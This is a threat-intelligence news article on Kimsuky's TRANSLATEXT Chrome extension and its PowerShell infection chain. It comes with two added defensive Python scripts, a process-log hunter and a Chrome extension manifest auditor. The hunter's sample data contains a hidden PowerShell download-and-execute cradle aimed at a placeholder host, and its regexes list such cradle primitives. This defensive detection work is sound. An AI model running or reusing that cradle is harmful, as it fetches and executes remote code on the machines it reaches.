Kimsuky uses the TRANSLATEXT Chrome extension to steal sensitive data

By Admin, July 7, 2024
June 28, 2024 | Cyber espionage / Cyber attack
A North Korean-linked threat actor known as Kimsuky has been tied to a new malicious Google Chrome extension designed to steal sensitive information as part of its ongoing intelligence-gathering efforts.

Zscaler ThreatLabz, which observed the activity in early March 2024, codenamed the extension TRANSLATEXT and highlighted its ability to collect email addresses, usernames, passwords, cookies and browser screenshots.

The targeted campaign is believed to have been directed against South Korean academics, particularly those involved in North Korean political affairs.

Kimsuky is a well-known North Korean hacking team that has been active since at least 2012, orchestrating cyber espionage and financially motivated attacks against South Korean organizations.


A sister group to the Lazarus cluster and part of the Reconnaissance General Bureau (RGB), it is also tracked under the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet, Springtail and Velvet Chollima.

In recent weeks, the group has weaponized a known security flaw in Microsoft Office (CVE-2017-11882) to spread a keylogger, and has used work-themed lures in attacks targeting the aerospace and defense sectors to deliver an espionage tool with data-collection functions and the ability to execute a secondary payload.

“The backdoor, which does not appear to have been publicly documented before, allows an attacker to perform basic reconnaissance and drop additional payloads to hijack or remotely control a machine,” cyber security company CyberArmor said. The company has named the backdoor Niki.


The exact mode of initial access for the newly discovered activity is currently unclear, although the group is known to use phishing and social engineering attacks to activate the infection chain.

The starting point of the attack is a ZIP archive that purports to be about Korean military history and contains two files: a Hangul text document and an executable file.

Running the executable retrieves a PowerShell script from a server controlled by the attacker, which in turn exfiltrates information about the compromised victim to a GitHub repository and loads additional PowerShell code using a Windows Shortcut (LNK) file.
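The chain described above (archive-dropped executable, PowerShell download-and-execute stage, data pushed to a public code-hosting site) leaves a recognizable footprint in process-creation telemetry. The script below is an added example, not Zscaler's detection logic or anything from the original article: it scores Sysmon-style process-creation records against a few simple indicators and flags an event when at least two of them coincide. The event records and the field names (`parent_image`, `image`, `command_line`) are constructed for the example and are an assumption about the log schema; the download URL and file names are placeholders, not indicators from the report.

```python
"""Hunt for the PowerShell fetch-and-run stage in process-creation events.

Added example. The records below are constructed, not real telemetry, and
the schema (parent_image / image / command_line) is an assumed simplification
of a Sysmon Event ID 1 feed.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample events: two benign, one matching the described chain.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # admin opens PowerShell ISE from the desktop shell
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe",
        "command_line": "powershell_ise.exe",
    },
    {   # installed software runs a signed maintenance script
        "parent_image": r"C:\Program Files\Vendor\updater.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell.exe -File "C:\\Program Files\\Vendor\\check.ps1"',
    },
    {   # executable extracted from an archive in Temp spawns a hidden download cradle
        "parent_image": r"C:\Users\alice\AppData\Local\Temp\history_archive\history.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                        ".DownloadString('https://placeholder.invalid/stage.ps1')\"",
    },
]

# Parent binary living somewhere a user (or a ZIP extraction) can write.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(AppData|Downloads|Desktop)|Temp|ProgramData)\\", re.I)
# Common download-and-execute primitives seen in one-liner cradles.
DOWNLOAD_CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
    r"|Invoke-Expression|\bIEX\b|-enc\w*|FromBase64String)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
# Public hosting used as a drop point in the described chain.
PUBLIC_HOSTING = re.compile(r"(github\.com|githubusercontent\.com|blogspot\.com)", re.I)


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the indicators an event matches; empty list for non-PowerShell or clean events."""
    if not ev["image"].lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return []
    reasons = []
    if USER_WRITABLE.search(ev["parent_image"]):
        reasons.append("parent executable in user-writable path")
    if DOWNLOAD_CRADLE.search(ev["command_line"]):
        reasons.append("download/execute cradle in command line")
    if HIDDEN_WINDOW.search(ev["command_line"]):
        reasons.append("hidden window requested")
    if PUBLIC_HOSTING.search(ev["command_line"]):
        reasons.append("contacts public code/blog hosting")
    return reasons


def hunt(events: List[Dict[str, str]], min_reasons: int = 2) -> List[Tuple[int, List[str]]]:
    """Flag events that trip at least `min_reasons` indicators; returns (index, reasons) pairs."""
    hits = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {ev['command_line'] if (ev := SAMPLE_EVENTS[idx]) else ''}")
        for r in reasons:
            print(f"  - {r}")
```

Requiring two coinciding indicators keeps a lone `-w hidden` from a scheduled task, or a legitimate `Invoke-WebRequest` in an admin script, from paging anyone; the Temp-directory parent plus a cradle is the combination worth a ticket. The GitHub and Blogspot patterns are there because the report names those services as drop and command channels, but in an environment where developers routinely pull from GitHub that indicator should be weighted, not treated as binary.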

Zscaler said it found a GitHub account, created on February 13, 2024, that briefly hosted the TRANSLATEXT extension under the name “GoogleTranslate.crx”, although its delivery method is currently unknown.


“These files were in storage on March 7, 2024 and were deleted the next day, which means that Kimsuky intended to minimize exposure and use the malware for a short period to target specific individuals,” said security researcher Seongsoo Park.

TRANSLATEXT, which masquerades as Google Translate, includes JavaScript code to bypass the security measures of services such as Google, Kakao and Naver; harvest email addresses, credentials and cookies; take screenshots of the browser; and exfiltrate the stolen data.

It is also designed to receive commands from a Blogger Blogspot URL, among them taking screenshots of recently opened tabs and deleting all cookies from the browser.
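An extension that harvests cookies and screenshots every tab cannot do so without asking Chrome for the matching permissions, and a `.crx` delivered outside the Web Store carries no Web Store `update_url` in its manifest. The audit below is an added example (not Zscaler's detection logic and not code from the article) that walks a Chrome profile's `Extensions` directory and flags the combination the report describes: sideloaded, cookie and tab access on every host, and a Google Translate lookalike name. The two manifests it builds in a temporary directory are constructed for the example; the extension IDs are placeholders, and the heuristics are mine.

```python
"""Audit installed Chrome extensions for a TRANSLATEXT-like risk profile.

Added example. Manifests and extension IDs below are constructed; the checks
are heuristics, not a signature for the real extension. On Windows the
directory to pass is normally
%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Extensions.
"""
import json
import os
import tempfile
from typing import Dict, List

# Extensions installed from the Chrome Web Store carry this update_url.
WEBSTORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def audit_manifest(m: Dict) -> List[str]:
    """Return risk indicators for one parsed manifest.json (empty list = nothing found)."""
    findings = []
    perms = set(m.get("permissions", [])) | set(m.get("optional_permissions", []))
    # MV3 lists hosts under host_permissions; MV2 mixes them into permissions.
    hosts = set(m.get("host_permissions", [])) | {p for p in perms if "://" in p or p == "<all_urls>"}
    sideloaded = m.get("update_url") != WEBSTORE_UPDATE_URL
    if sideloaded:
        findings.append("not updated from the Chrome Web Store (sideloaded .crx or unpacked)")
    if "cookies" in perms and hosts & BROAD_HOSTS:
        findings.append("can read cookies for every site")
    if {"tabs", "activeTab"} & perms and hosts & BROAD_HOSTS:
        findings.append("can enumerate and capture any tab")
    label = (m.get("name", "") + " " + m.get("description", "")).lower()
    if "google" in label and "translate" in label and sideloaded:
        findings.append("Google Translate lookalike not installed from the store")
    return findings


def audit_profile(extensions_dir: str) -> Dict[str, List[str]]:
    """Scan <Extensions>/<id>/<version>/manifest.json and map extension id -> findings."""
    report: Dict[str, List[str]] = {}
    for ext_id in sorted(os.listdir(extensions_dir)):
        ext_path = os.path.join(extensions_dir, ext_id)
        if not os.path.isdir(ext_path):
            continue
        for version in sorted(os.listdir(ext_path)):
            manifest_path = os.path.join(ext_path, version, "manifest.json")
            if not os.path.isfile(manifest_path):
                continue
            with open(manifest_path, encoding="utf-8") as fh:
                findings = audit_manifest(json.load(fh))
            if findings:
                report[ext_id] = findings
    return report


def build_sample_profile() -> str:
    """Create a throwaway Extensions directory with one clean and one suspicious manifest."""
    root = tempfile.mkdtemp(prefix="ext_audit_")
    samples = {
        # constructed placeholder id: store-installed extension with narrow permissions
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": {
            "manifest_version": 3, "name": "Sample Notes", "version": "1.0",
            "update_url": WEBSTORE_UPDATE_URL, "permissions": ["storage"],
        },
        # constructed placeholder id: sideloaded lookalike with the risky combination
        "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": {
            "manifest_version": 3, "name": "Google Translate", "version": "1.0",
            "permissions": ["cookies", "tabs", "storage"],
            "host_permissions": ["<all_urls>"],
        },
    }
    for ext_id, manifest in samples.items():
        version_dir = os.path.join(root, ext_id, "1.0_0")
        os.makedirs(version_dir)
        with open(os.path.join(version_dir, "manifest.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


if __name__ == "__main__":
    for ext_id, findings in audit_profile(build_sample_profile()).items():
        print(ext_id)
        for f in findings:
            print("  -", f)
```

The `update_url` check is the most useful single signal here, because the report says the extension was hosted as a bare `.crx` on GitHub rather than published through the store; note that enterprise-managed extensions pushed from an internal update server will also trip it and should be allow-listed by ID. The Blogspot command channel is not visible in a manifest, so catching that piece belongs in proxy or DNS telemetry, where a browser extension's background context reaching a blog-hosting domain it has no business with is the thing to look for.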

“One of the main tasks of Kimsuky’s group is to conduct surveillance on academic and government personnel in order to gather valuable intelligence,” Park said.
